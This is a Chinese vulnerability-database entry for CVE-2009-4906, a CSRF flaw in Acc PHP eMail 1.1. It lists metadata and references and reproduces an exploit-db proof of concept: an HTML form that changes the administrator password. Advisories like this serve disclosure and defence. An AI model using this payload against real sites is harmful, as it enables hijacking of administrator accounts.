Acc PHP eMail 'index.php'跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118761 漏洞类型 跨站请求伪造
发布时间 2009-12-13 更新时间 2010-06-25
CVE编号 CVE-2009-4906 CNNVD-ID CNNVD-201006-409
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/10412
https://www.securityfocus.com/bid/79112
https://cxsecurity.com/issue/WLB-2010060199
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-409
|漏洞详情
AccPHPeMail是电子邮件订阅和管理脚本。AccPHPeMail1.1的index.php存在跨站请求伪造漏洞。远程攻击者可以借助劫持管理员用户的认证请求修改密码。
|漏洞EXP
______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] Acc PHP eMail v1.1 - [ CSRF ]
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath,,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#  It Changes the password
#
#  http://localhost/mailinglist/index.php
#
# // Start CSRF
# <html>
# <form action="http://localhost/mailinglist/demo/index.php" method="POST">
# <input type="hidden" name="action" value="change">
# <input type="hidden" name="id" value="1">
# <input type="hidden" id="text" name="user" value="admin">
# <input type="password"  name="password" value="pass">
# <input type="password"  name="password1" value="pass">
# <input type="hidden" name="action" value="change1">
# <input type="submit" name="login" value="Modify">
# </form>
# </html>
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF
|受影响的产品
Accscripts Acc Php Email 1.1
|参考资料

来源:VUPEN
名称:ADV-2009-3508
链接:http://www.vupen.com/english/advisories/2009/3508
来源:EXPLOIT-DB
名称:10412
链接:http://www.exploit-db.com/exploits/10412
来源:SECUNIA
名称:37666
链接:http://secunia.com/advisories/37666
来源:MISC
链接:http://packetstormsecurity.org/0912-exploits/ape-xsrf.txt